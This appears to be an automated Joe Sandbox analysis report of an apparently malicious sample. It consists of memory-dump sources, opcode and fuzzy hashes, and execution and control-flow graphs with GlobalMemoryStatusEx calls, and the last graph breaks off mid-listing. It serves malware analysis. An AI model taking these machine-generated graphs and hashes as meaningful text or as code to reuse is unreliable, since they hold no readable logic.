                                                                                                                    • String ID: D`:vD`:v$D`:vD`:v
                                                                                                                    • API String ID: 4108700736-3916433284
                                                                                                                    • Opcode ID: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                    • Instruction ID: 7b5742814f41c47d4244d2c3f0283e0289412fe64b87ae5b76c2526650b71fed
                                                                                                                    • Opcode Fuzzy Hash: 8a31f6e7c9d8c4b79f68c5e1b4c980db31f3675092d636c129533732d18511af
                                                                                                                    • Instruction Fuzzy Hash: 4BF074B5A04248AFCB40EFB9D981D8A77F8BB4C304B5044B6F948D7351E674EA448B58
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000B.00000001.2122152486.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000B.00000001.2122152486.0000000000479000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000B.00000001.2122152486.000000000058C000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_11_1_400000_lxsyrsiW.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                    • Instruction ID: 66f553c3c70c46b8825420ed88d2deaa6b5bdf89b3e430e74c23cac08a3ac52f
                                                                                                                    • Opcode Fuzzy Hash: 1956bb551ae66424eeb29415ec14ed0c03fc86ff94ae4dcffb4638495b0d7fb1
                                                                                                                    • Instruction Fuzzy Hash: 65A00457F1D540DFD71317107C5515037745F1554575D4CF3445545053D11D44445535

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:13.2%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:194
                                                                                                                    Total number of Limit Nodes:24
                                                                                                                    execution_graph 31590 2890848 31592 289084a 31590->31592 31591 289091b 31592->31591 31594 289137f 31592->31594 31595 2891383 31594->31595 31596 2891370 31594->31596 31595->31596 31604 2897ce0 31595->31604 31613 2897c0c 31595->31613 31622 2897cad 31595->31622 31631 2897ea8 31595->31631 31639 2897c74 31595->31639 31648 2897c85 31595->31648 31657 2897d90 31595->31657 31596->31592 31606 2897da6 31604->31606 31605 2897f03 31607 2897f12 31605->31607 31678 289f7bf 31605->31678 31683 289f612 31605->31683 31606->31605 31608 2897e57 31606->31608 31666 2898708 31606->31666 31672 2898750 31606->31672 31607->31595 31615 2897c0b 31613->31615 31614 2897f03 31616 2897f12 31614->31616 31620 289f7bf 3 API calls 31614->31620 31621 289f612 3 API calls 31614->31621 31615->31613 31615->31614 31617 2897e57 31615->31617 31618 2898708 3 API calls 31615->31618 31619 2898750 3 API calls 31615->31619 31616->31595 31618->31615 31619->31615 31620->31616 31621->31616 31624 2897c6d 31622->31624 31623 2897f03 31625 2897f12 31623->31625 31627 289f7bf 3 API calls 31623->31627 31628 289f612 3 API calls 31623->31628 31624->31622 31624->31623 31626 2897e57 31624->31626 31629 2898708 3 API calls 31624->31629 31630 2898750 3 API calls 31624->31630 31625->31595 31627->31625 31628->31625 31629->31624 31630->31624 31632 2897eb2 31631->31632 31634 2897ecc 31632->31634 31637 65cfb58 3 API calls 31632->31637 31638 65cfb68 3 API calls 31632->31638 31633 2897f12 31633->31595 31634->31633 31635 289f7bf 3 API calls 31634->31635 31636 289f612 3 API calls 31634->31636 31635->31633 31636->31633 31637->31634 31638->31634 31640 2897c6d 31639->31640 31640->31639 31641 2897f03 31640->31641 31643 2897e57 31640->31643 31644 2898708 3 API calls 31640->31644 31645 2898750 3 API calls 31640->31645 31642 2897f12 31641->31642 31646 289f7bf 3 API calls 31641->31646 31647 289f612 3 API calls 31641->31647 31642->31595 31644->31640 31645->31640 31646->31642 31647->31642 31649 2897c0b 31648->31649 31649->31648 31650 2897f03 31649->31650 31652 2897e57 31649->31652 31653 2898708 3 API calls 31649->31653 31654 2898750 3 API calls 31649->31654 31651 2897f12 31650->31651 31655 289f7bf 3 API calls 31650->31655 31656 289f612 3 API calls 31650->31656 31651->31595 31653->31649 31654->31649 31655->31651 31656->31651 31659 2897da6 31657->31659 31658 2897f03 31660 2897f12 31658->31660 31664 289f7bf 3 API calls 31658->31664 31665 289f612 3 API calls 31658->31665 31659->31658 31661 2897e57 31659->31661 31662 2898708 3 API calls 31659->31662 31663 2898750 3 API calls 31659->31663 31660->31595 31662->31659 31663->31659 31664->31660 31665->31660 31667 289870d 31666->31667 31668 2898f2d 31667->31668 31688 2899f98 31667->31688 31693 289a04b 31667->31693 31698 2899fa8 31667->31698 31668->31606 31673 2898769 31672->31673 31674 2898f2d 31673->31674 31675 2899f98 3 API calls 31673->31675 31676 2899fa8 3 API calls 31673->31676 31677 289a04b 3 API calls 31673->31677 31674->31606 31675->31673 31676->31673 31677->31673 31679 289f7ca 31678->31679 31765 65cfb58 31679->31765 31770 65cfb68 31679->31770 31680 289f7d1 31680->31607 31684 289f639 31683->31684 31685 289f6af 31684->31685 31775 289f840 31684->31775 31781 289f850 31684->31781 31690 2899fc5 31688->31690 31689 289a061 31690->31689 31703 289a098 31690->31703 31709 289a0a8 31690->31709 31694 289a020 31693->31694 31695 289a061 31694->31695 31696 289a098 3 API calls 31694->31696 31697 289a0a8 3 API calls 31694->31697 31696->31694 31697->31694 31700 2899fc5 31698->31700 31699 289a061 31700->31699 31701 289a098 3 API calls 31700->31701 31702 289a0a8 3 API calls 31700->31702 31701->31700 31702->31700 31705 289a0a8 31703->31705 31704 289a182 31705->31704 31715 289a2d8 31705->31715 31722 289a4d6 31705->31722 31729 289a1ba 31705->31729 31711 289a0c2 31709->31711 31710 289a182 31711->31710 31712 289a2d8 3 API calls 31711->31712 31713 289a1ba 3 API calls 31711->31713 31714 289a4d6 3 API calls 31711->31714 31712->31711 31713->31711 31714->31711 31717 289a1e1 31715->31717 31716 289a505 31716->31705 31717->31716 31719 289a2d8 3 API calls 31717->31719 31720 289a1ba 3 API calls 31717->31720 31721 289a4d6 3 API calls 31717->31721 31736 289df00 31717->31736 31719->31717 31720->31717 31721->31717 31724 289a1e1 31722->31724 31723 289a505 31723->31705 31724->31723 31725 289df00 3 API calls 31724->31725 31726 289a2d8 3 API calls 31724->31726 31727 289a1ba 3 API calls 31724->31727 31728 289a4d6 3 API calls 31724->31728 31725->31724 31726->31724 31727->31724 31728->31724 31731 289a1e1 31729->31731 31730 289a505 31730->31705 31731->31730 31732 289a2d8 3 API calls 31731->31732 31733 289a1ba 3 API calls 31731->31733 31734 289a4d6 3 API calls 31731->31734 31735 289df00 3 API calls 31731->31735 31732->31731 31733->31731 31734->31731 31735->31731 31738 289df1a 31736->31738 31737 289df6b 31737->31717 31738->31737 31741 289eed0 31738->31741 31745 289ef18 31741->31745 31753 289ef08 31741->31753 31742 289e37e 31742->31717 31746 289ef4d 31745->31746 31747 289ef25 31745->31747 31761 289e680 31746->31761 31747->31742 31750 289ef6e 31750->31742 31751 289f036 GlobalMemoryStatusEx 31752 289f066 31751->31752 31752->31742 31754 289ef18 31753->31754 31755 289ef25 31754->31755 31756 289e680 GlobalMemoryStatusEx 31754->31756 31755->31742 31758 289ef6a 31756->31758 31757 289ef6e 31757->31742 31758->31757 31759 289f036 GlobalMemoryStatusEx 31758->31759 31760 289f066 31759->31760 31760->31742 31762 289eff0 GlobalMemoryStatusEx 31761->31762 31764 289ef6a 31762->31764 31764->31750 31764->31751 31766 65cfb7d 31765->31766 31767 65cfd92 31766->31767 31768 289e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31766->31768 31769 289df00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31766->31769 31767->31680 31768->31766 31769->31766 31772 65cfb7d 31770->31772 31771 65cfd92 31771->31680 31772->31771 31773 289e1e1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31772->31773 31774 289df00 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31772->31774 31773->31772 31774->31772 31776 289f850 31775->31776 31777 289f883 31776->31777 31787 289f890 31776->31787 31794 289fb06 31776->31794 31801 289fa87 31776->31801 31777->31684 31782 289f855 31781->31782 31783 289f883 31782->31783 31784 289f890 3 API calls 31782->31784 31785 289fa87 3 API calls 31782->31785 31786 289fb06 3 API calls 31782->31786 31783->31684 31784->31782 31785->31782 31786->31782 31789 289f8b7 31787->31789 31788 289fb32 31789->31788 31791 289fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31789->31791 31793 289fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31789->31793 31808 289ff9c 31789->31808 31812 289fd19 31789->31812 31791->31789 31793->31789 31796 289f916 31794->31796 31795 289fb32 31796->31795 31797 289fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31796->31797 31798 289fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31796->31798 31799 289fd19 3 API calls 31796->31799 31800 289ff9c 3 API calls 31796->31800 31797->31796 31798->31796 31799->31796 31800->31796 31803 289f916 31801->31803 31802 289fb32 31803->31802 31804 289fd19 3 API calls 31803->31804 31805 289fb6a GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31803->31805 31806 289ff9c 3 API calls 31803->31806 31807 289fb70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 31803->31807 31804->31803 31805->31803 31806->31803 31807->31803 31811 289fd47 31808->31811 31809 289df00 3 API calls 31809->31811 31810 289fd8a 31810->31789 31811->31809 31811->31810 31815 289fd47 31812->31815 31813 289df00 3 API calls 31813->31815 31814 289fd8a 31814->31789 31815->31813 31815->31814 31816 65b64f8 31817 65b6560 CreateWindowExW 31816->31817 31819 65b661c 31817->31819 31820 65ba250 DuplicateHandle 31821 65ba2e6 31820->31821

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 128 65c3178-65c3199 129 65c319b-65c319e 128->129 130 65c31c4-65c31c7 129->130 131 65c31a0-65c31bf 129->131 132 65c31cd-65c31ec 130->132 133 65c3968-65c396a 130->133 131->130 141 65c31ee-65c31f1 132->141 142 65c3205-65c320f 132->142 135 65c396c 133->135 136 65c3971-65c3974 133->136 135->136 136->129 137 65c397a-65c3983 136->137 141->142 143 65c31f3-65c3203 141->143 146 65c3215-65c3224 142->146 143->146 254 65c3226 call 65c3998 146->254 255 65c3226 call 65c3990 146->255 147 65c322b-65c3230 148 65c323d-65c351a 147->148 149 65c3232-65c3238 147->149 170 65c395a-65c3967 148->170 171 65c3520-65c35cf 148->171 149->137 180 65c35f8 171->180 181 65c35d1-65c35f6 171->181 183 65c3601-65c3614 180->183 181->183 185 65c361a-65c363c 183->185 186 65c3941-65c394d 183->186 185->186 189 65c3642-65c364c 185->189 186->171 187 65c3953 186->187 187->170 189->186 190 65c3652-65c365d 189->190 190->186 191 65c3663-65c3739 190->191 203 65c373b-65c373d 191->203 204 65c3747-65c3777 191->204 203->204 208 65c3779-65c377b 204->208 209 65c3785-65c3791 204->209 208->209 210 65c37f1-65c37f5 209->210 211 65c3793-65c3797 209->211 212 65c37fb-65c3837 210->212 213 65c3932-65c393b 210->213 211->210 214 65c3799-65c37c3 211->214 225 65c3839-65c383b 212->225 226 65c3845-65c3853 212->226 213->186 213->191 221 65c37c5-65c37c7 214->221 222 65c37d1-65c37ee 214->222 221->222 222->210 225->226 228 65c386a-65c3875 226->228 229 65c3855-65c3860 226->229 233 65c388d-65c389e 228->233 234 65c3877-65c387d 228->234 229->228 232 65c3862 229->232 232->228 238 65c38b6-65c38c2 233->238 239 65c38a0-65c38a6 233->239 235 65c387f 234->235 236 65c3881-65c3883 234->236 235->233 236->233 243 65c38da-65c392b 238->243 244 65c38c4-65c38ca 238->244 240 65c38a8 239->240 241 65c38aa-65c38ac 239->241 240->238 241->238 243->213 245 65c38cc 244->245 246 65c38ce-65c38d0 244->246 245->243 246->243 254->147 255->147
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-3723351465
                                                                                                                    • Opcode ID: 749b38ae0fcac93b3f6553b2f9da5d61572568393681ec4cdb4889ed61edcae9
                                                                                                                    • Instruction ID: 4e5ffa3b1f7cd9eecae4b04493f2c9230b911f75b22a09b4d409f3a8c33ddef0
                                                                                                                    • Opcode Fuzzy Hash: 749b38ae0fcac93b3f6553b2f9da5d61572568393681ec4cdb4889ed61edcae9
                                                                                                                    • Instruction Fuzzy Hash: 09322031E1061A8FCB55EFB8C89459DB7B6FFC9310F10C669D449A7264EB30A986CF81

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 797 65c7e78-65c7e96 798 65c7e98-65c7e9b 797->798 799 65c7e9d-65c7eab 798->799 800 65c7eb2-65c7eb5 798->800 808 65c7ead 799->808 809 65c7f1e-65c7f34 799->809 801 65c7eb7-65c7ec1 800->801 802 65c7ec2-65c7ec5 800->802 804 65c7ee8-65c7eeb 802->804 805 65c7ec7-65c7ee3 802->805 806 65c7f0c-65c7f0e 804->806 807 65c7eed-65c7f07 804->807 805->804 810 65c7f15-65c7f18 806->810 811 65c7f10 806->811 807->806 808->800 816 65c814f-65c8159 809->816 817 65c7f3a-65c7f43 809->817 810->798 810->809 811->810 819 65c7f49-65c7f66 817->819 820 65c815a-65c818f 817->820 827 65c813c-65c8149 819->827 828 65c7f6c-65c7f94 819->828 823 65c8191-65c8194 820->823 825 65c83c9-65c83cc 823->825 826 65c819a-65c81a9 823->826 829 65c83ce-65c83ea 825->829 830 65c83ef-65c83f2 825->830 838 65c81c8-65c820c 826->838 839 65c81ab-65c81c6 826->839 827->816 827->817 828->827 850 65c7f9a-65c7fa3 828->850 829->830 831 65c849d-65c849f 830->831 832 65c83f8-65c8404 830->832 835 65c84a6-65c84a9 831->835 836 65c84a1 831->836 841 65c840f-65c8411 832->841 835->823 840 65c84af-65c84b8 835->840 836->835 848 65c839d-65c83b3 838->848 849 65c8212-65c8223 838->849 839->838 845 65c8429-65c842d 841->845 846 65c8413-65c8419 841->846 853 65c842f-65c8439 845->853 854 65c843b 845->854 851 65c841d-65c841f 846->851 852 65c841b 846->852 848->825 862 65c8388-65c8397 849->862 863 65c8229-65c8246 849->863 850->820 857 65c7fa9-65c7fc5 850->857 851->845 852->845 856 65c8440-65c8442 853->856 854->856 860 65c8444-65c8447 856->860 861 65c8453-65c848c 856->861 867 65c812a-65c8136 857->867 868 65c7fcb-65c7ff5 857->868 860->840 861->826 880 65c8492-65c849c 861->880 862->848 862->849 863->862 875 65c824c-65c8342 call 65c6698 863->875 867->827 867->850 881 65c7ffb-65c8023 868->881 882 65c8120-65c8125 868->882 930 65c8344-65c834e 875->930 931 65c8350 875->931 881->882 889 65c8029-65c8057 881->889 882->867 889->882 894 65c805d-65c8066 889->894 894->882 896 65c806c-65c809e 894->896 903 65c80a9-65c80c5 896->903 904 65c80a0-65c80a4 896->904 903->867 907 65c80c7-65c811e call 65c6698 903->907 904->882 906 65c80a6 904->906 906->903 907->867 932 65c8355-65c8357 930->932 931->932 932->862 933 65c8359-65c835e 932->933 934 65c836c 933->934 935 65c8360-65c836a 933->935 936 65c8371-65c8373 934->936 935->936 936->862 937 65c8375-65c8381 936->937 937->862
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q
                                                                                                                    • API String ID: 0-127220927
                                                                                                                    • Opcode ID: d9da41688d0e19d50cfb4f219142a154be54f7bffd01b0e63c69cfca8fad8d56
                                                                                                                    • Instruction ID: d5ba662fa542adb5d0ac44db3c42e8846d42399aabc3f2e0060af6a139a0d74a
                                                                                                                    • Opcode Fuzzy Hash: d9da41688d0e19d50cfb4f219142a154be54f7bffd01b0e63c69cfca8fad8d56
                                                                                                                    • Instruction Fuzzy Hash: 5402AE30B002059FDB54DFA8D990AAEBBE6FF84314F14896DD4199B394DB34EC46CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ec10e727ac10ce7c637d59896c1278a028ac0e0140750b308f43788ceecff6c
                                                                                                                    • Instruction ID: ed2da3dcdcc842167bba060945524dbb7a57ae05cdfc1d032bad574d5381705f
                                                                                                                    • Opcode Fuzzy Hash: 9ec10e727ac10ce7c637d59896c1278a028ac0e0140750b308f43788ceecff6c
                                                                                                                    • Instruction Fuzzy Hash: 97A21434A002088FDBA4DBA8C584B9DB7F2FB49324F54C4A9D409AB365DB35ED86CF51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6a410b171279a66f065ea6c79d67ae85fd72712d61071fad54cc9ffb4ff0849e
                                                                                                                    • Instruction ID: 8ce92d5799f53eecc94d519e8476b53cc7132fb814a84579629632927d4af31e
                                                                                                                    • Opcode Fuzzy Hash: 6a410b171279a66f065ea6c79d67ae85fd72712d61071fad54cc9ffb4ff0849e
                                                                                                                    • Instruction Fuzzy Hash: 0F628C34A002059FDB54DBA8D594AADB7F2FF88324F148469E40AEB394DB35ED46CF81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a81c0df323ce9913719394404ab2b02f6fa1e213adef906a45b243529f420475
                                                                                                                    • Instruction ID: 42e7f4e67afcdb631538d2008ec4e403f6931a0d55a35372d408b8a477dc4cce
                                                                                                                    • Opcode Fuzzy Hash: a81c0df323ce9913719394404ab2b02f6fa1e213adef906a45b243529f420475
                                                                                                                    • Instruction Fuzzy Hash: 02326E34A102099FDF54DFA8D990AAEB7B6FB88320F108529D409EB355DB35EC46CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0ab6754e05eaf12f7a5ab90c2641bd40a87328667b748341b173404503bac656
                                                                                                                    • Instruction ID: 45fea60449cddb87a85f2fae5acdc16585004a4d94974eda7d6e7f5c4d4ec979
                                                                                                                    • Opcode Fuzzy Hash: 0ab6754e05eaf12f7a5ab90c2641bd40a87328667b748341b173404503bac656
                                                                                                                    • Instruction Fuzzy Hash: 3212C231E002159FDB64DBE4C8906AEB7B2FF84320F248469D54A9B345EB34ED56CF91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e7ff6883e75466a94274ac7050527f3cfa6f8353219387bc2ed17d3e783f734c
                                                                                                                    • Instruction ID: 46cccc8849f8e469560293cf6db1916f995c3288f58ceca9b58ee83caf3d2788
                                                                                                                    • Opcode Fuzzy Hash: e7ff6883e75466a94274ac7050527f3cfa6f8353219387bc2ed17d3e783f734c
                                                                                                                    • Instruction Fuzzy Hash: 7A227E70E002099FDF64CBA8D9817AEB7B6FB45320F20892AE445DB395DB34DC85CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 65cadd0-65cadee 1 65cadf0-65cadf3 0->1 2 65cadf5-65cae11 1->2 3 65cae16-65cae19 1->3 2->3 4 65cafed-65caff6 3->4 5 65cae1f-65cae22 3->5 9 65caffc-65cb006 4->9 10 65cae37-65cae40 4->10 6 65cae24-65cae2d 5->6 7 65cae32-65cae35 5->7 6->7 7->10 11 65cae4f-65cae52 7->11 12 65cae46-65cae4a 10->12 13 65cb007-65cb011 10->13 14 65cae6c-65cae6f 11->14 15 65cae54-65cae67 11->15 12->11 23 65cb067-65cb069 13->23 24 65cb013-65cb019 13->24 17 65cae71-65cae7e 14->17 18 65cae83-65cae86 14->18 15->14 17->18 21 65cae88-65cae8d 18->21 22 65cae90-65cae93 18->22 21->22 30 65caea4-65caea6 22->30 31 65cae95-65cae99 22->31 27 65cb06b 23->27 28 65cb076-65cb079 23->28 25 65cb06f 24->25 26 65cb01b-65cb03e 24->26 36 65cb08f-65cb0ca 25->36 37 65cb071 25->37 33 65cb040-65cb043 26->33 27->25 38 65cb07b-65cb085 28->38 39 65cb086-65cb089 28->39 34 65caead-65caeb0 30->34 35 65caea8 30->35 31->9 32 65cae9f 31->32 32->30 40 65cb045-65cb061 33->40 41 65cb066 33->41 34->1 42 65caeb6-65caeda 34->42 35->34 47 65cb2bd-65cb2d0 36->47 48 65cb0d0-65cb0dc 36->48 37->28 39->36 43 65cb2f2-65cb2f5 39->43 40->41 41->23 61 65cafea 42->61 62 65caee0-65caeef 42->62 45 65cb304-65cb306 43->45 46 65cb2f7 call 65cb32a 43->46 51 65cb30d-65cb310 45->51 52 65cb308 45->52 54 65cb2fd-65cb2ff 46->54 53 65cb2d2 47->53 59 65cb0fc-65cb140 48->59 60 65cb0de-65cb0f7 48->60 51->33 55 65cb316-65cb320 51->55 52->51 53->43 54->45 77 65cb15c-65cb19b 59->77 78 65cb142-65cb154 59->78 60->53 61->4 65 65caf07-65caf42 call 65c6698 62->65 66 65caef1-65caef7 62->66 85 65caf5a-65caf71 65->85 86 65caf44-65caf4a 65->86 68 65caef9 66->68 69 65caefb-65caefd 66->69 68->65 69->65 83 65cb1a1-65cb27c call 65c6698 77->83 84 65cb282-65cb297 77->84 78->77 83->84 84->47 96 65caf89-65caf9a 85->96 97 65caf73-65caf79 85->97 89 65caf4c 86->89 90 65caf4e-65caf50 86->90 89->85 90->85 103 65caf9c-65cafa2 96->103 104 65cafb2-65cafe3 96->104 99 65caf7d-65caf7f 97->99 100 65caf7b 97->100 99->96 100->96 105 65cafa4 103->105 106 65cafa6-65cafa8 103->106 104->61 105->104 106->104
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.2389896683.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_65c0000_neworigin.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                    • API String ID: 0-1273862796
                                                                                                                    • Opcode ID: 3848b6624df7d71b1d97566bb0b633240753f8c7225d1efdd9f1bcaaa1ae2695
                                                                                                                    • Instruction ID: d84b10f99e9947c69366652ab27b0de4b953122e527845e3a8ac98ac06363172
                                                                                                                    • Opcode Fuzzy Hash: 3848b6624df7d71b1d97566bb0b633240753f8c7225d1efdd9f1bcaaa1ae2695
                                                                                                                    • Instruction Fuzzy Hash: 7BE16E34E102098FDF59DFA8D9906AEB7B6FF85314F10892DD409AB354DB34E846CB91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 256 65cb760-65cb782 257 65cb784-65cb787 256->257 258 65cb7ae-65cb7b1 257->258 259 65cb789-65cb78d 257->259 260 65cb7c8-65cb7cb 258->260 261 65cb7b3-65cb7b7 258->261 262 65cbb05-65cbb3e 259->262 263 65cb793-65cb7a3 259->263 265 65cb7cd-65cb7cf 260->265 266 65cb7d2-65cb7d5 260->266 261->262 264 65cb7bd-65cb7c3 261->264 273 65cbb40-65cbb43 262->273 271 65cb7a9 263->271 272 65cb936-65cb93a 263->272 264->260 265->266 269 65cb7d7-65cb7dd 266->269 270 65cb7e2-65cb7e5 266->270 269->270 274 65cb7f9-65cb7fc 270->274 275 65cb7e7-65cb7eb 270->275 271->258 272->262 276 65cb940-65cb950 272->276 277 65cbb45-65cbb61 273->277 278 65cbb66-65cbb69 273->278 280 65cbad5-65cbad6 274->280 281 65cb802-65cb805 274->281 275->262 279 65cb7f1-65cb7f4 275->279 302 65cba9a-65cba9e 276->302 303 65cb956 276->303 277->278 284 65cbb6f-65cbb97 278->284 285 65cbdd5-65cbdd7 278->285 279->274 286 65cbadb-65cbade 280->286 282 65cb869-65cb86c 281->282 283 65cb807-65cb864 call 65c6698 281->283 291 65cb87c-65cb87f 282->291 292 65cb86e-65cb877 282->292 283->282 336 65cbb99-65cbb9c 284->336 337 65cbba1-65cbbe5 284->337 293 65cbdde-65cbde1 285->293 294 65cbdd9 285->294 287 65cbae8-65cbaea 286->287 288 65cbae0-65cbae5 286->288 300 65cbaec 287->300 301 65cbaf1-65cbaf4 287->301 288->287 295 65cb8a1-65cb8a4 291->295 296 65cb881-65cb89c 291->296 292->291 293->273 297 65cbde7-65cbdf0 293->297 294->293 306 65cb8ae-65cb8b1 295->306 307 65cb8a6-65cb8a9 295->307 296->295 300->301 301->257 305 65cbafa-65cbb04 301->305 302->262 308 65cbaa0-65cbab0 302->308 309 65cb95b-65cb95e 303->309 314 65cb8c1-65cb8c4 306->314 315 65cb8b3-65cb8bc 306->315 307->306 308->280 331 65cbab2 308->331 316 65cb978-65cb97b 309->316 317 65cb960-65cb966 309->317 321 65cb8c6-65cb8db 314->321 322 65cb903-65cb906 314->322 315->314 318 65cb97d-65cb981 316->318 319 65cb992-65cb995 316->319 317->262 323 65cb96c-65cb973 317->323 318->262 324 65cb987-65cb98d 318->324 319->280 327 65cb99b-65cb99e 319->327 321->262 348 65cb8e1-65cb8fe 321->348 325 65cb908-65cb911 322->325 326 65cb916-65cb919 322->326 323->316 324->319 325->326 332 65cbabc-65cbac5 326->332 333 65cb91f-65cb922 326->333 334 65cb9b0-65cb9b3 327->334 335 65cb9a0 327->335 338 65cbab7-65cbaba 331->338 346 65cba0a-65cba13 332->346 347 65cbacb 332->347 340 65cb924-65cb92a 333->340 341 65cb931-65cb934 333->341 343 65cb9c5-65cb9c8 334->343 344 65cb9b5-65cb9c0 334->344 351 65cb9a8-65cb9ab 335->351 336->297 375 65cbdca-65cbdd4 337->375 376 65cbbeb-65cbbf4 337->376 338->332 345 65cbad0-65cbad3 338->345 340->317 349 65cb92c 340->349 341->272 341->309 353 65cb9d9-65cb9dc 343->353 354 65cb9ca-65cb9ce 343->354 344->343 345->280 345->286 346->262 350 65cba19-65cba20 346->350 347->345 348->322 349->341 355 65cba25-65cba28 350->355 351->334 359 65cb9ec-65cb9ef 353->359 360 65cb9de-65cb9e7 353->360 354->315 358 65cb9d4 354->358 355->280 363 65cba2e-65cba31 355->363 358->353 359->340 362 65cb9f5-65cb9f8 359->362 360->359 365 65cb9fa-65cba00 362->365 366 65cba05-65cba08 362->366 367 65cba54-65cba57 363->367 368 65cba33-65cba4f 363->368 365->366 366->346 366->355 371 65cba59-65cba6e 367->371 372 65cba95-65cba98 367->372 368->367 371->262 380 65cba74-65cba90 371->380 372->302 372->338 378 65cbbfa-65cbc66 call 65c6698 376->378 379 65cbdc0-65cbdc5 376->379 390 65cbc6c-65cbc71 378->390 391 65cbd60-65cbd75 378->391 379->375 380->372 393 65cbc8d 390->393 394 65cbc73-65cbc79 390->394 391->379 395 65cbc8f-65cbc95 393->395 396 65cbc7f-65cbc81 394->396 397 65cbc7b-65cbc7d 394->397 398 65cbcaa-65cbcb7 395->398 399 65cbc97-65cbc9d 395->399 400 65cbc8b 396->400 